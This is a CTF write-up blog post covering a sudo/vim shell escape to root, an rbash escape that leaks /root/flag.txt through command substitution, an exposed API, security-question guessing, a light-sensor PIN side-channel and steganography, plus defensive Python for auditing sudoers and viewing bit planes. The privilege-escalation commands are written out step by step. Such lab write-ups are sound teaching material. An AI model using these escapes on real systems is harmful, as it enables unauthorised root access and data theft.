Better late than never, I hope? A few weeks ago, I participated in the MITRE STEM Cyber Challenge CTF. My team placed 9th in the professional division, which was really cool.
January 8, 2014
All you need to do is read the flag!
So easy, ha! Okay, let’s get started.
$ ssh ctf@138.247.13.103
I originally thought that the date was a hint about the age of the file (since we can’t ls or use a number of other commands to search for it). I read about searching by date, and tried
touch --date "2010-01-05" /tmp/foo
to find the file location, but without much luck.
After reading some restricted shell guides, especially this one by Fireshell, I tried a number of things and continued without much luck. 😅
We are able to cat files, however. If we take a look at /etc/sudoers:
$ cat /etc/sudoers
Towards the bottom of the file, we see:
ctf ALL=(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt
We could also have found this information by typing:
$ sudo -l
User ctf may run the following commands on 483daf0e3bde:
(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt
Okay, so we can run one command as sudo, and that’s
/usr/bin/vim /home/ctf/*/*/HackMe2.txt
We can use :!/bin/sh to spawn a shell from inside vim (vim hands everything after the ! to the shell), and because sudo started vim as root, that shell is a root shell, so:
$ sudo /usr/bin/vim /home/ctf/*/*/HackMe2.txt
:!/bin/sh
# cat /root/flag.txt
The flag is MCA{ohghov1ieli7Eo2}.
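The sudo rule in this challenge is weak for three independent reasons: NOPASSWD, an interactive editor that has a shell escape, and a wildcard in the permitted argument path. As an added example (my code, not part of the original writeup), here is a small Python audit that parses sudoers user specifications and flags those properties; the list of shell-escape binaries, the sample file contents other than the ctf line, and the function names are my own choices.

```python
import os
import re
from dataclasses import dataclass

# Editors and pagers that let an interactive user run a shell (e.g. vim's ":!sh").
# Assumed list for this example; a real audit would use a maintained catalogue.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "view", "nano", "emacs", "less", "more", "man", "ed"}

# Lines that are not user specifications and are skipped by the audit.
SKIP_PREFIXES = ("#", "Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# user_spec:  who  hosts = (runas) [TAG: ...] command
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")


@dataclass
class Finding:
    who: str
    runas: str
    command: str
    reasons: list


def parse_rule(line):
    """Split one sudoers user specification into its parts, or return None."""
    line = line.strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest, tags = m.group("rest"), []
    while (t := TAG_RE.match(rest)):          # peel off NOPASSWD:, SETENV:, ...
        tags.append(t.group(1))
        rest = rest[t.end():]
    return {
        "who": m.group("who"),
        "runas": m.group("runas") or "root",   # sudo defaults to root when no runas is given
        "tags": tags,
        "command": rest.strip(),
    }


def audit_rule(line):
    """Return a Finding for a risky rule, or None if there is nothing to flag."""
    rule = parse_rule(line)
    if rule is None:
        return None
    reasons, command = [], rule["command"]
    if "NOPASSWD" in rule["tags"]:
        reasons.append("NOPASSWD: privilege change without re-authentication")
    if command == "ALL":
        reasons.append("ALL: unrestricted command")
    else:
        binary = os.path.basename(command.split()[0])
        if binary in SHELL_ESCAPE_BINARIES:
            reasons.append(f"{binary}: interactive program with a shell escape")
        if any(ch in command for ch in "*?["):
            reasons.append("wildcard in the allowed argument path")
    if not reasons:
        return None
    return Finding(rule["who"], rule["runas"], command, reasons)


def audit_sudoers(text):
    """Audit a whole sudoers file and return the list of findings, in file order."""
    return [f for f in (audit_rule(l) for l in text.splitlines()) if f]


# Constructed sample sudoers content; only the ctf line comes from the challenge box.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
ops     ALL=(root) /usr/bin/systemctl restart nginx
ctf ALL=(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.who} -> ({f.runas}) {f.command}")
        for r in f.reasons:
            print("   -", r)
```

Run against the sample, the root line is reported for its unrestricted ALL and the ctf line for all three weaknesses, while the narrowly scoped systemctl rule produces no finding. The same check can be pointed at the output of `sudo -l` once the "(root) NOPASSWD:" prefix is joined back to a user name.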
Turing Test
This one wasn’t a technical challenge so much as a lesson in how insecure “security challenge” questions are.
Some of the MITRE participants complained that this challenge wasn’t technical, but as several Krebs blog posts show, it is (sadly) a Real Thing That Happens. Ugly goals are still goals (or, depending on your sport of preference, touchdowns, etc.).
The questions are:
- Mother’s Maiden Name (Stoney)
- First School Attended (St. Michael’s… the casing on this one took forever)
- Favorite Primary School Subject (Science)
- Favorite Olympic Event (Marathon)
- 2 + 2 – 3 = ? (1)
- Is it a leap year? (yes)
- I agree Security Questions are Bad (check)
Our flag is MCA{sms_2fa_is_bad_also}.
Or as one contestant put it:
TODO
TODO: remember where I put the flag
http://138.247.13.110/
This was a fun web challenge. If you navigate to the site, you see a very “Todoist” style landing page.
Is it an XSS challenge? No, sadly.
But if you open up Dev Tools and take a closer look at the code, you’ll notice that there’s a todoURL that’s part of the API used by the todolist app.
If we navigate to http://138.247.13.110/api/todos/ we can see a list of ALL the TODOs. There are several hundred of them.
We could write a script, or we could just Control+F the page and search for MCA{.
Our flag is MCA{al3x4_5et_a_r3minder}.
Clean Room
This is another Linux escape challenge.
The year is 30xx. Clyde is trapped in an interdimensional transport module. The Federation has captured the module and has prepared to dock. The captain of the Federation lander has instructed the henchmen to bring Clyde in to Federation custody. As a precaution they will place Clyde in a clean room to remove any radiation. Luckily, you’ve hacked into the lander’s mainframe. Help Clyde escape!
Once you ssh in:
ssh ctf@138.247.13.108
You’ll find that you’ve got a pretty restricted shell… you can’t use cd, ls and so on. I went through a number of restricted shell resources, including this one.
Since I spent so much time banging my head against the wall on the other Linux challenges, I got this one pretty quickly and thus, didn’t write extensive notes.
I guessed the location of flag.txt, and then used command substitution (the backticks) to feed the contents of that file back to our rbash terminal, since we can’t use cat or anything like that. rbash tries to run the file’s contents as a command name, and its “command not found” error prints the flag for us.
ctf@492ec54ef83d:~$ `< /root/flag.txt`
-rbash: MCA{ieHaisoh4eif2ae}: command not found
Light at the End of the Tunnel
This was an interesting forensics challenge, and another one with a partial answer. I read some other writeups and felt that they didn’t answer the “graph values to PIN values” question, either.
The team has recovered the light sensor values from the target’s phone. We need you to use these values and identify the target’s 8-digit bank PIN. The target is a creature of habit so we’ve used that to our advantage. The sensor values are taken over a week during his commute on the subway. Same seat and roughly the same time so the conditions are good for your technique. There is good intelligence that the target typed in the PIN multiple times throughout the week during the commute. We also recovered the light sensor values from right before a phone call was made on the target’s phone, when the target was typing in a known phone number. However, these values were recorded under different lighting conditions than when the target was entering their 8-digit bank PIN. Note: The flag for this challenge is MCA{PIN}
In this challenge, you get a file with a bunch of values. The first step is to remove the noise. If you open the file up in Excel or a similar program and graph each set of numbers, you’ll see that there’s a bunch of noise, then a pattern, then more noise.
I also normalized each set (originally “taken under different lighting conditions”) to make it easier to see the patterns.
There’s another number set provided along with the PIN that is supposed to be a phone number. Another writeup that I read knew what number it mapped to but didn’t fully explain how. In any case, I missed that part entirely.
We know that the PIN is 8 chars long. In the above photo (and especially with the larger picture of “noise” on either side), we can say that the middle 8 points are the PIN.
Because the PIN numbers can range from 0 to 9, I set the graph lines to match the points, using the distance between the closest points (on the Y axis) as the step value.
Then, we can see that the graph points span 8 values. That could be 0-7, 1-8 or 2-9.
As a result, the PIN could be 47015407, 58126518 or 69236529. Again, if I had the phone number part sorted out, it wouldn’t be a guess, but the answer is MCA{58126518}.
Nomination
Finally, a fun stego challenge and a reminder to always try StegSolve. 😉
Surprised Pikachu is old. Let’s get this surprised cat going.
We get an image of a cat:
strings doesn’t return anything interesting, but if we flip through a few layers in StegSolve, we can clearly see the flag:
The flag is MCA{g1jVx4a2zcpoZx2q}
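The “layers” StegSolve flips through are bit planes: one bit of one colour channel, drawn as black and white for every pixel. As an added example (my code, not from the writeup, and not StegSolve’s), this Python builds a constructed 8x8 RGB image with a pattern hidden in the least-significant bit of the red channel and extracts planes the way StegSolve displays them: the top plane of red shows only the cover gradient, the bottom plane shows the hidden pattern, and the bottom plane of green shows regular stripes that come from the cover itself rather than from anything hidden. Pixel tuples stand in for an image file so no imaging library is needed.

```python
WIDTH, HEIGHT = 8, 8


def build_cover_image():
    """Constructed 8x8 RGB image: a smooth colour gradient whose red LSBs carry an 'X'."""
    pixels = []
    for y in range(HEIGHT):
        row = []
        for x in range(WIDTH):
            r = 40 + 20 * x          # red ramps left to right, 40..180
            g = 200 - 15 * y         # green ramps top to bottom
            b = 90
            hidden = 1 if (x == y or x + y == WIDTH - 1) else 0
            r = (r & ~1) | hidden    # overwrite only the least-significant bit of red
            row.append((r, g, b))
        pixels.append(row)
    return pixels


def bit_plane(pixels, channel, bit):
    """One bit plane: for every pixel, bit `bit` of channel 0 (R), 1 (G) or 2 (B)."""
    return [[(px[channel] >> bit) & 1 for px in row] for row in pixels]


def render(plane):
    """ASCII version of what StegSolve draws: '#' for a set bit, '.' for a clear bit."""
    return "\n".join("".join("#" if b else "." for b in row) for row in plane)


def set_bits(plane):
    """Number of set bits in a plane; a quick sanity figure when paging through planes."""
    return sum(sum(row) for row in plane)


IMAGE = build_cover_image()

if __name__ == "__main__":
    for label, channel, bit in (("red bit 7", 0, 7), ("red bit 0", 0, 0), ("green bit 0", 1, 0)):
        plane = bit_plane(IMAGE, channel, bit)
        print(f"{label} ({set_bits(plane)} set bits)")
        print(render(plane))
        print()
```

Paging through the planes is exactly what the StegSolve session in the writeup does; the high planes track the visible picture, while a low plane that suddenly shows text or a shape is the sign that something was embedded there. The green LSB plane is the caveat: smooth gradients and dithering also produce structured low planes, so structure alone is a prompt to look closer, not proof of a payload.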